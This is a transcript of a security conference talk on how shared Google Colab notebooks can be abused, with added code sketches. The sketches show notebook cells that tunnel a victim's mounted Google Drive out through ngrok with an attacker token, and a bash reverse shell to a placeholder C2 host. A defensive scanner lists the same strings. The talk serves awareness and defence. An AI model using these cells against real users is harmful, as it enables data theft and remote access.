[00:02.930 --> 00:09.450] Let me introduce Antonio. I'd like to welcome to the stage Antonio Piazza, [00:09.450 --> 00:16.310] who's going to present Careful Who You Colab With: Abusing Google Colaboratory. Antonio [00:16.310 --> 00:21.730] Piazza, hailing from Cleveland, Ohio, USA, is a Purple Team Leader and Offensive Security [00:21.730 --> 00:26.990] Engineer at NVIDIA. Following his stint as a U.S. Army Human Intelligence Collector [00:26.990 --> 00:34.490] (you and I should talk after your talk), he worked as a Defense Contractor Operator on an NSA Red [00:34.490 --> 00:41.450] Team, so he's intimately familiar with spies, hacking, and nerd stuff. Antonio is passionate [00:41.450 --> 00:47.590] about all things related to macOS security and hacking, and thus spends his days researching macOS [00:47.590 --> 00:54.030] internals and security, as well as writing free open-source Red Team tools for use in the defense [00:54.030 --> 00:59.550] against the dark arts. Oh, that sounds cool. As of late, he has been planning [00:59.550 --> 01:05.810] to implement machine learning into Red Teaming with his NVIDIA colleagues. So, please welcome [01:05.810 --> 01:36.010] Antonio.

Sorry, I have to give you access, I guess. Oh, I see. Sorry. I was looking for your [01:36.010 --> 01:47.240] handle. There we go. Okay, you have access. All right. Make sure to pick up a microphone [01:47.240 --> 01:58.720] to get megaphone access. Just point your pointer at one of the microphones, and it'll change from [01:58.900 --> 02:10.660] a circle to a funny-looking icon, and then left-click to pick it up. Is that right? Left-click... [02:18.840 --> 02:26.060] I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay, yeah, [02:30.780 --> 02:34.680] I can learn how to use these controls. That'd be wonderful.

[02:35.760 --> 02:42.400] Okay, thanks everyone. I really appreciate you coming and listening to this. Can everyone hear [02:42.400 --> 02:53.140] me okay before I start going on? This is my first time doing anything formal in VR, so hopefully it goes [02:53.140 --> 02:59.400] well. I'm going to be looking at my slides a lot, so yell at me if something happens.

[03:01.160 --> 03:07.080] So anyway, when I started this research, I was toying around with the idea of creating a startup [03:07.740 --> 03:14.540] that would provide a service to artists, allowing them to gain inspiration through AI. [03:14.540 --> 03:19.460] That was the premise of the startup idea I had. And I wanted to start with music, [03:19.460 --> 03:28.420] because that's where my passion is. The idea was that a musician who needs inspiration for writing [03:28.420 --> 03:34.580] their next song could submit some samples of their own music, or of songs they wish [03:34.580 --> 03:42.600] to emulate or gain inspiration from. And the AI would then throw together a bunch of [03:42.600 --> 03:50.540] riffs similar to, but not the same as, the style the user submitted. I started using [03:50.540 --> 03:57.100] Google Colaboratory and getting involved in the AI art and music community, including [03:57.100 --> 04:04.460] the Dadabots Discord server, and reading white papers concerning SampleRNN. [04:04.940 --> 04:10.860] I didn't have a great GPU in my own computer at the time, and they were super expensive [04:10.860 --> 04:18.760] and hard to get. Not anymore, thanks to me working at NVIDIA.
Some AI researchers in the community [04:18.760 --> 04:24.920] directed me to Google Colaboratory. So I started playing with it and found it to be a great tool [04:24.920 --> 04:29.560] for AI collaboration, and you get a free GPU, which is really nice. [04:30.180 --> 04:35.600] So this research didn't start with anything to do with security. Next slide, please.

[04:36.980 --> 04:43.920] Then a researcher in the Dadabots Discord pointed me to another project he was involved in, called OpenAI [04:43.920 --> 04:53.800] Jukebox. This platform allows the user to train the AI by feeding it a song, [04:53.800 --> 05:00.500] and the AI will give you, in return, a song in which the artist sings the lyrics you provide. So I was [05:00.500 --> 05:06.140] playing around and trying to get Elvis to sing the lyrics of Sir Mix-a-Lot's Baby Got Back [05:06.140 --> 05:11.440] in the style of Suspicious Minds. Next slide, please.

[05:13.140 --> 05:19.020] And a researcher, Brockaloo, from the AI Jukebox research project helped me out by tweaking some [05:19.020 --> 05:25.220] of the configurations in my Colab file, which he shared with me via this Discord message. [05:25.420 --> 05:31.720] I opened the file in Colab as normal, and again, as normal, I began the process of mounting my [05:31.720 --> 05:38.960] Google Drive in Colab. And this is when it hit me. When I mounted my Google Drive, this prompt [05:38.960 --> 05:43.440] came up on the screen. I don't know if you can read it, but it says: this notebook is [05:43.440 --> 05:49.100] requesting access to your Google Drive files. Granting access to Google Drive will permit code executed [05:49.100 --> 05:55.600] in the notebook to modify files in your Google Drive. Make sure to review notebook code prior [05:55.600 --> 06:01.840] to allowing this access. And that's where the security research began for this. So next slide, please.

[06:02.960 --> 06:07.920] And again, the talk is titled Careful Who You Colab With: Abusing Google Colaboratory. [06:07.920 --> 06:15.540] Next slide, please. And I am Antonio Piazza. I go by Antman1P on the Twitters. [06:15.560 --> 06:22.220] I'm an offensive security engineer. Most of my security experience is strictly red teaming. [06:22.340 --> 06:29.420] I've worked at Zoom, Box, and the Cleveland Clinic, and on an NSA red team as a defense contractor. [06:29.420 --> 06:34.440] And now I am the purple team leader at NVIDIA on the threat operations team. [06:34.960 --> 06:41.500] And that ODIN logo down there, I have some stickers. If you're here at DEF CON, I'll be [06:41.500 --> 06:45.360] down in the AI Village after this talk, and I'll hand them out if you want some. [06:46.480 --> 06:52.160] I'm also in my final course of the Master of Science in Information Security Engineering [06:52.160 --> 06:58.280] program at the SANS Technology Institute. I'm a father of five, a husband, and again, I love music. [06:58.280 --> 06:59.740] Next slide, please.

[07:02.500 --> 07:06.500] So the agenda here is going to be pretty brief. We're going to discuss [07:06.500 --> 07:10.980] what Google Colaboratory is, because I'm sure some of you don't know, though some of you might be [07:10.980 --> 07:15.880] familiar. We're going to talk about how we can abuse Google Colab, and then we're going to [07:15.880 --> 07:26.360] conclude. Next slide, please.

So what is Google Colaboratory? I'll let Google define it, [07:26.360 --> 07:32.540] because I think they describe it best.
Colaboratory, or Colab for short, is a product [07:32.540 --> 07:38.840] from Google Research. Colab allows anybody to write and execute arbitrary Python code through [07:38.840 --> 07:45.780] the browser, and is especially well suited to machine learning, data analysis, and education. [07:45.980 --> 07:52.900] More technically, Colab is a hosted Jupyter Notebook service that requires no setup to use, [07:52.900 --> 07:59.660] while providing access free of charge to computing resources, including GPUs. [07:59.700 --> 08:04.320] Colab resources are not guaranteed and not unlimited, and the usage limits sometimes [08:04.320 --> 08:11.360] fluctuate. So if you're interested in having more reliable access and better resources, [08:11.360 --> 08:16.260] you can purchase Colab Pro, which is, I think, about $50 a month.

[08:16.800 --> 08:23.100] What is the difference between Jupyter and Colab? Jupyter is the open-source project on [08:23.100 --> 08:30.580] which Colab is based. Colab allows you to use and share Jupyter Notebooks with others without [08:30.580 --> 08:35.980] having to download, install, or run anything. So that's the example I gave of [08:35.980 --> 08:44.760] Brockaloo sharing a Colab file with me; he was actually sharing a Jupyter Notebook file. [08:44.760 --> 08:46.380] Next slide, please.

[08:47.520 --> 08:54.720] How is Colab normally used? You can write your own notebooks, which are stored in your Google [08:54.720 --> 09:00.540] account's Google Drive. Basically, you write Python code in a Jupyter Notebook cell, [09:00.540 --> 09:07.960] and you execute the cells by pushing the execute button. When you open or start a notebook, [09:07.960 --> 09:13.700] you connect it to a Colab runtime, and that's where your GPU and other resources [09:14.760 --> 09:20.520] spin up and start running. You may also connect your notebook to your Google Drive. [09:20.520 --> 09:27.200] So in the picture on the slide here, I've got arrows pointing at a Jupyter cell, and you can see the little [09:27.200 --> 09:32.460] black play button, which is how you run a cell, and then the upper right-hand corner is [09:32.460 --> 09:38.860] just showing you the resource usage for your runtime. Next slide, please.

[09:40.600 --> 09:47.660] How is Colab normally used? Continuing on: you can import Python libraries, just as you [09:47.660 --> 09:54.600] normally would in Python. You can install dependencies with pip, and you can clone Git [09:54.600 --> 10:05.540] repos, all from these Jupyter Notebook cells. Next slide, please. You also have a Colab terminal. [10:05.540 --> 10:11.960] Once connected to the Colab runtime, you have a terminal that you can use to run shell commands, [10:11.960 --> 10:17.620] and once connected to Drive, you can navigate the connected Google Drive file system.

[10:19.080 --> 10:23.360] A question: where is my code executed? What happens to my execution [10:23.360 --> 10:27.800] state if I close the browser window? The code is executed in a virtual machine [10:28.740 --> 10:32.140] private to your account. Virtual machines are deleted [10:32.140 --> 10:37.440] when idle for a while, and have a maximum lifetime enforced by the Colab service. [10:37.440 --> 10:41.220] I haven't sat down and tried to figure out what that time is, but that's something I'll probably do [10:41.220 --> 10:46.920] in the future. It seems to last a while, as long as you're active. Next slide, please.
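To make that concrete, here is a minimal sketch of what those everyday Colab cells typically look like. The audio library and the repo URL below are placeholder examples of mine, not anything shown in the talk; the mount path is Colab's standard /content/drive.

```python
# Cell 1: mount your Google Drive so data and outputs persist beyond the runtime
from google.colab import drive
drive.mount('/content/drive')

# Cell 2: install a dependency with pip ("!" hands the line to the runtime's shell)
!pip install librosa

# Cell 3: clone a Git repo into the runtime's filesystem
!git clone https://github.com/example/some-ml-project.git

# Cell 4: plain Python runs directly in a cell
import os
print(os.listdir('/content/drive/MyDrive'))
```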
[10:50.970 --> 10:57.050] Finally, I want to touch on system aliases. So Jupyter has a number of system aliases, [10:57.050 --> 11:05.690] basically command shortcuts for common operations such as ls, cat, ps, and kill, so just your normal [11:05.690 --> 11:15.090] *nix commands. You can execute these from a Jupyter Notebook cell by adding the [11:15.930 --> 11:22.450] bang, the exclamation point, before the command, so bang ls (!ls) will run the ls command. [11:23.110 --> 11:24.810] Next slide, please.

[11:26.450 --> 11:34.550] All right, so how is this abusable? Let's recap. If I'm an adversary and I share a Colab file, [11:34.550 --> 11:40.510] a Jupyter Notebook, with someone, and they choose to use my file, they must mount their [11:40.510 --> 11:47.250] Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent [11:47.250 --> 11:53.850] them. The adversary could potentially access all of the contents of a victim's Google Drive and [11:53.850 --> 12:00.650] exfiltrate anything they choose at that point. The adversary could edit the victim's Colab [12:00.650 --> 12:09.230] files to create backdoors that might go on to exploit other users the victim collaborates with. [12:09.810 --> 12:16.170] The adversary can have a reverse shell on the Colab virtual machine, the runtime we're talking about. [12:17.630 --> 12:26.630] Is there a possibility of a VM escape? Maybe. All of this could be as simple as sending a phishing [12:26.630 --> 12:34.010] email with a link to a malicious Colab file, or sending a link to a malicious Colab file in an [12:34.010 --> 12:39.510] AI community Discord server, just like the ones I hang out in, and kind of the way that Brockaloo [12:39.510 --> 12:46.870] shared the file. I've got to say, the one he shared with me was not malicious, by the way. He got scared [12:46.870 --> 12:50.410] when he saw these slides. He thought, oh my God, did I send you something malicious? [12:50.410 --> 12:57.470] I'm like, no, no, no, that just got my brain working like an adversary. So you can hide [12:58.010 --> 13:02.770] malicious code in Jupyter cells. You can hide it in Git repos, since you can clone Git repos [13:02.770 --> 13:07.470] into a Jupyter Notebook. So there are a number of ways. Next slide, please.

[13:11.490 --> 13:16.170] So for a clear understanding of what an attacker might have access to, [13:16.170 --> 13:20.990] should they successfully gain access to a victim's Colab runtime or their Google Drive, [13:20.990 --> 13:28.290] here are the permissions that one grants when mounting a Google Drive for a Colab session. [13:29.450 --> 13:33.230] If you're having a hard time seeing these, I can read them real quick: see, [13:33.230 --> 13:39.170] edit, create, and delete all of your Google Drive files. View the photos, videos, and albums in your [13:39.170 --> 13:46.450] Google Photos. Retrieve mobile client configuration and experimentation. View your [13:46.450 --> 13:53.370] Google people information, such as profiles and contacts, basically all the contacts you have [13:53.370 --> 14:01.070] in your Google account, whether from your phone or your Gmail. See, edit, create, and delete [14:01.070 --> 14:05.190] any of your Google Drive documents. Next slide, please.
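To make that Drive scope concrete, here is a small illustrative sketch of my own (not a slide from the talk): once a notebook has been granted that access, ordinary Python in any cell can walk and read everything under the mount point.

```python
# Illustrative only: after drive.mount('/content/drive'), the victim's files sit
# under an ordinary directory tree that any cell in the notebook can read.
import os

drive_root = '/content/drive/MyDrive'
for root, dirs, files in os.walk(drive_root):
    for name in files:
        # an attacker's code could read or exfiltrate any of these paths
        print(os.path.join(root, name))
```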
[14:08.430 --> 14:14.670] To see what an attacker might do, we can take a look at MITRE ATLAS. [14:14.770 --> 14:21.200] ATLAS stands for Adversarial Threat Landscape for Artificial-Intelligence Systems. [14:21.930 --> 14:27.930] It's a knowledge base of adversary tactics, techniques, and case studies for machine learning systems, [14:28.720 --> 14:34.630] based on real-world observations, demonstrations from machine learning red teams and security [14:34.630 --> 14:41.670] groups, and the state of what's possible from academic research. ATLAS is basically modeled [14:41.670 --> 14:47.370] after the MITRE ATT&CK framework, which people are more commonly familiar with, and its tactics [14:47.370 --> 14:54.470] and techniques are complementary to those in MITRE ATT&CK.

So how can an attacker do this? [14:54.470 --> 15:00.550] Well, for initial access, we discussed phishing the AI community or ML research community via [15:00.550 --> 15:08.330] email or Discord servers. MITRE ATLAS has a machine learning supply chain compromise technique [15:08.330 --> 15:14.830] under the initial access tactic. That makes sense here, so maybe we can add a sub-technique there [15:14.830 --> 15:23.610] for Jupyter Notebook sharing. There's also user execution under the execution tactic: an attacker might [15:23.610 --> 15:29.990] hide a backdoor in a Jupyter cell, or maybe hide a backdoor in a Git repo that the notebook clones. [15:30.610 --> 15:32.330] Next slide, please.

[15:34.630 --> 15:38.690] This is an example of hiding malicious code in Jupyter Notebook cells. [15:38.890 --> 15:45.850] Here on the left is code that will give an adversary access to the victim's Google Drive. [15:45.910 --> 15:52.430] If an adversary shared this notebook, a victim might easily recognize that this is not [15:52.890 --> 16:01.330] AI or ML code; the one on the left is all just for the adversary getting access to Google Drive. [16:01.350 --> 16:05.550] But some AI and ML notebooks are quite large. As you can see on the right, [16:05.550 --> 16:09.710] that's not even the whole thing, and I zoomed out as far as possible to take that screenshot. [16:10.230 --> 16:16.930] An adversary might be able to hide the malicious bits within normal machine learning code. [16:16.930 --> 16:22.910] The image on the right is just one small piece of a Colab project that an AI community [16:22.910 --> 16:29.030] member shared with me. There's nothing malicious in there; it's just [16:29.030 --> 16:35.010] an example of how much code there is that an adversary could hide malicious cells and [16:35.010 --> 16:37.990] malicious code in. Next slide, please.

[16:40.170 --> 16:48.930] Okay, so this is the example of the malicious code by the numbers. Imagine you receive [16:49.610 --> 16:57.090] a link to a Colab file and you open it. If you run all of this, you will give the sender access [16:57.090 --> 17:05.410] to all of your Google Drive files via ngrok. In the first step of the code, the [17:05.410 --> 17:09.850] victim is going to mount their Google Drive. And again, this is normal behavior for all Colab [17:09.850 --> 17:17.830] files, right? In order to persist and store the data created from running one of [17:17.830 --> 17:22.710] these, you have to store it somewhere, and when you're in the cloud, that means mounting your Drive and [17:22.710 --> 17:30.610] storing it there. In the next step, you wget the ngrok tarball and untar it. [17:31.330 --> 17:39.530] The third step is to register the attacker's ngrok API key. It's a bit dangerous [17:40.450 --> 17:47.690] for an attacker to hard-code an API key, I guess, but an attacker can always change it when they're [17:47.690 --> 17:55.610] done pillaging, or if the attack is unsuccessful, so it's not too bad. Step four is to [17:55.610 --> 18:04.710] start a Python server on a specified port, like 9999 in this case, and then, in step five, run ngrok [18:04.710 --> 18:21.130] on the same port. Next slide, please.
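To make those five steps concrete, here is a minimal hedged sketch of what the malicious cells might look like. The ngrok download URL, the <ATTACKER_AUTHTOKEN> placeholder, and the use of get_ipython().system_raw() to background the processes are my own illustrative assumptions rather than the exact code from the demo; the port matches the 9999 mentioned above.

```python
# Step 1: the victim mounts their Google Drive (looks like any normal Colab notebook)
from google.colab import drive
drive.mount('/content/drive')

# Step 2: download the ngrok tarball into the runtime and untar it
!wget -q https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
!tar -xzf ngrok-v3-stable-linux-amd64.tgz

# Step 3: register the attacker's ngrok authtoken with the agent
!./ngrok config add-authtoken <ATTACKER_AUTHTOKEN>

# Step 4: serve the mounted Drive over HTTP on port 9999, in the background
get_ipython().system_raw('cd /content/drive/MyDrive && python3 -m http.server 9999 &')

# Step 5: tunnel that port out through ngrok so the attacker can reach it
get_ipython().system_raw('./ngrok http 9999 &')
```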
So this is a video demo. [18:21.130 --> 18:29.470] I don't know, were you able to run the videos from this presentation? I don't know if that problem [18:29.470 --> 18:41.430] was solved... I don't know if anybody can hear me. It should be running right now. Oh, [18:41.430 --> 18:47.770] it's running. Okay. I can't see it, but I'll just go ahead. So the victim, again, will run the Colab [18:47.770 --> 18:54.550] file and mount their Drive. So you can see, off screen, I'm picking my Gmail [18:54.550 --> 19:01.530] account and allowing the Drive access, as I showed in the image earlier. And now I could navigate [19:01.530 --> 19:09.370] the file system on the left if I wanted. So I'm installing Python requests; I don't [19:09.370 --> 19:17.290] really need it here, but I want to show how you can use pip if needed. I do a pwd to show the [19:17.290 --> 19:25.490] correct location of the Google Drive file system. And then I curl ifconfig.me to show [19:25.490 --> 19:35.030] my Colab VM's IP address. Then wget to download ngrok, tar to untar ngrok, ngrok [19:35.030 --> 19:43.610] config to add my API key, the Python server to serve the Google Drive root directory, [19:43.610 --> 19:54.990] and finally ngrok itself.

And then on the attacker side, the attacker goes to the ngrok agents page. [19:56.210 --> 20:02.150] Is there a way to tilt my view so I can look up and see the slides? I'm looking down. [20:03.210 --> 20:05.570] Yes, move your mouse forward. [20:09.830 --> 20:13.730] Oh, there it is. Okay. Oh, did something go wrong? [20:15.130 --> 20:24.450] Oh, no. No, no, you're okay. I think I'll just keep going. So on the attacker side, the attacker [20:24.450 --> 20:32.670] goes to the ngrok agents page, and you might have seen there that the IP address of the agent matched what I got [20:32.670 --> 20:43.070] from curling ifconfig.me. And then we're in. So we can navigate the Google Drive file system [20:43.070 --> 20:49.430] and download whatever we want from the victim. What you're seeing there is basically [20:49.430 --> 21:00.450] an in-browser representation of the victim's Google Drive. Next slide, please.

[21:04.110 --> 21:12.790] Okay, so that was the example of being able to get into a victim's Google Drive. This one is a [21:12.790 --> 21:21.630] reverse shell example. It's really just two simple steps. Basically, [21:21.630 --> 21:30.450] mount the victim's Google Drive, and then do a bash TCP reverse shell to the adversary's C2 [21:30.450 --> 21:35.450] server IP address. I didn't show a video for this because it's just so simple, [21:35.450 --> 21:43.630] but you get the idea of what a reverse shell is going to look like. Next slide, please.
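As a rough sketch, those two cells might look something like the following. The bash /dev/tcp one-liner is the standard pattern for the kind of reverse shell described here, and <C2_IP> and <C2_PORT> are placeholders for the adversary's listener, not values from the talk.

```python
# Step 1: the victim mounts their Google Drive, as with any other Colab notebook
from google.colab import drive
drive.mount('/content/drive')

# Step 2: open a bash TCP reverse shell from the Colab VM back to the attacker's C2
!bash -c 'bash -i >& /dev/tcp/<C2_IP>/<C2_PORT> 0>&1'
```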
[21:44.670 --> 21:51.850] Okay, so knowing all this, what is the problem? Quickly: GPUs are a little harder to [21:51.850 --> 22:01.830] find right now because of supply chain issues, and they're pretty expensive, whereas Colab is free and even Pro [22:02.210 --> 22:10.290] is cheap. AI and ML researchers are starting to use Colab more, and the education sector and universities especially [22:10.290 --> 22:16.210] are using these cloud-based Jupyter Notebook [22:17.270 --> 22:22.150] runtime environments, or something similar. And researchers are collaborating and sharing, right? This is [22:22.390 --> 22:28.350] a pretty exciting time, where someone like me, who's not super [22:28.350 --> 22:34.570] schooled in AI and ML, can get their start, because there's just [22:34.570 --> 22:38.710] so much cool research going on and people are willing to share it, so you get to learn how to [22:38.710 --> 22:46.990] do all the crazy cool AI stuff.

Where I think the problem comes in is that most AI and ML [22:46.990 --> 22:53.150] researchers and developers are not security experts, right? So it's kind of like the [22:53.150 --> 22:59.130] beginning of software engineering, when nobody was really thinking about security. It took a while [22:59.130 --> 23:05.330] for that to change, and I think we're kind of back at square one with AI and ML [23:05.330 --> 23:11.590] researchers. The good news is that security has been around for a while, and we saw [23:11.590 --> 23:17.710] the mistakes that were being made at the beginning with software engineering. So hopefully [23:17.710 --> 23:25.250] we can quickly jump in and start securing things in the machine learning and AI [23:26.250 --> 23:34.550] sector. And finally, phishing is easy, right? I've been on a lot of red teams, and [23:34.550 --> 23:40.550] it's a numbers game. If I send out 100 phish, I know I'm going to get at least one, [23:40.550 --> 23:45.710] as long as they all make it through your email filtering. That's never really been [23:45.770 --> 23:57.630] a problem. And that's scary.

How can we fix it? Well, ML researchers and people who are [23:57.630 --> 24:05.050] collaborating should read the code someone shares with them. Let that Google Drive mount warning [24:05.050 --> 24:10.930] remind you every time: before I mount this, let me look through and make sure this code [24:10.930 --> 24:17.330] is good, it's what I was expecting, and there's nothing weird in there. And I know that's difficult, [24:17.330 --> 24:27.850] because, again, in one of these huge notebooks it might be [24:27.850 --> 24:32.930] difficult to find that needle in a haystack, especially if the researcher doesn't know what to [24:32.930 --> 24:40.250] look for. So that's one thing I think we, as security experts, should probably start doing: [24:41.770 --> 24:48.830] educating machine learning and AI researchers on what bad looks like. So this is me [24:48.830 --> 24:52.490] hopefully getting something out to the security community, and hopefully [24:52.490 --> 24:57.830] this will spread from the security community into the ML research and AI community. [24:58.370 --> 25:05.910] Start using your expertise to educate those folks on what bad looks like, so they can [25:05.910 --> 25:13.110] search for that in their notebooks. Maybe develop a code-sharing plugin [25:13.110 --> 25:19.510] in Google Drive; maybe Google can do that, or the open source community can do that.
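As a purely hypothetical illustration of that plugin idea (this is not an existing tool, just a sketch of what "knowing what bad looks like" could automate), a first pass could be as simple as flagging suspicious strings in a shared notebook's cells before you run it:

```python
# Hypothetical helper: flag a few "what bad looks like" strings in a shared
# .ipynb before running it. The string list is just a starting point drawn
# from the examples in this talk.
import json
import sys

SUSPICIOUS = ["ngrok", "/dev/tcp/", "http.server", "add-authtoken", "base64 -d"]

def scan_notebook(path):
    with open(path, "r", encoding="utf-8") as f:
        nb = json.load(f)
    for i, cell in enumerate(nb.get("cells", [])):
        source = "".join(cell.get("source", []))
        hits = [s for s in SUSPICIOUS if s in source]
        if hits:
            print(f"cell {i}: review before running -> {hits}")

if __name__ == "__main__":
    scan_notebook(sys.argv[1])  # e.g. python scan_notebook.py shared.ipynb
```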
[25:19.810 --> 25:28.570] Next slide, please. With that, thanks again. This is really cool, doing something for the first time [25:28.570 --> 25:36.830] in VR. Hopefully it went smoothly for everyone else. And again, I hope you got something out of [25:36.830 --> 25:42.330] this. Please feel free to ask any questions. I know I'm probably out of time here, but hopefully [25:42.330 --> 25:43.990] I can answer some questions.

[25:48.450 --> 25:53.890] Do you think this problem should be fixed by Google, or do you think it should be up to the user, [25:54.630 --> 26:00.490] basically, to watch out themselves and make sure they don't download any malicious code?

[26:01.750 --> 26:09.950] You know, it's funny, because I've heard that question before. Basically, is this a [26:09.950 --> 26:16.750] problem that the users need to solve? Well, absolutely. But if you think about it, [26:18.690 --> 26:22.730] security education has been trying to push the responsibility onto the user, which [26:22.730 --> 26:30.030] ultimately it is in the end. But is that working? Are users listening? [26:30.030 --> 26:38.310] Especially if you're securing an enterprise or a corporate network or [26:38.310 --> 26:46.410] something, we would hope all the users would do their due diligence, but it just never turns out that [26:46.410 --> 26:54.010] way, right? I would love it if every person were super diligent when opening an email and didn't [26:54.010 --> 27:00.130] click on a link, but it just never happens. So, yeah, I think it's always [27:00.130 --> 27:08.050] an end-user responsibility, but ultimately we have to do our part as well, [27:08.050 --> 27:16.190] as security experts. Should Google do anything? In my opinion, they should have more [27:16.190 --> 27:25.150] than just that warning. But I've submitted several things to Google. [27:25.150 --> 27:31.230] I don't try to pick on Google, but I use Google a lot, so I end up finding things. I've submitted [27:31.230 --> 27:35.450] things, and they're just like, oh, that's working as intended. And I'm like, that doesn't seem [27:35.450 --> 27:42.370] like great security practice. But no, that's the response. So I don't have an expectation that [27:42.370 --> 27:48.350] Google will do anything. I wish they would. But I think ultimately we're going to have [27:48.350 --> 27:57.730] to rely on the open source community to develop some plugins or, again, help educate people.

[28:04.760 --> 28:08.700] Next slide, please. I actually have one more slide. It's not really a [28:08.700 --> 28:18.080] question, but sometimes people want to hear the Baby Got Back thing with Elvis. I can play it if you want. [28:31.870 --> 28:35.430] Well, I don't know if that went as smoothly as I hoped, but [28:37.310 --> 28:46.690] it's a work in progress. It gets pretty crazy at the end, when the AI starts singing in [28:46.690 --> 28:55.490] some alien language. It reminds me of the show Devs, when they had that weird background [28:55.490 --> 29:02.450] noise of the quantum computer speaking. It's kind of spooky. But anyway, any other questions? [29:05.030 --> 29:07.850] All right. Well, thanks a lot. Again, I really appreciate it.

[29:11.250 --> 29:16.210] Thank you, Antonio, for your presentation. I guess we have to be careful who we colab [29:16.210 --> 29:20.330] with from here on out. I never thought of Jupyter Notebooks being used in that way. That's [29:20.330 --> 29:21.090] quite clever.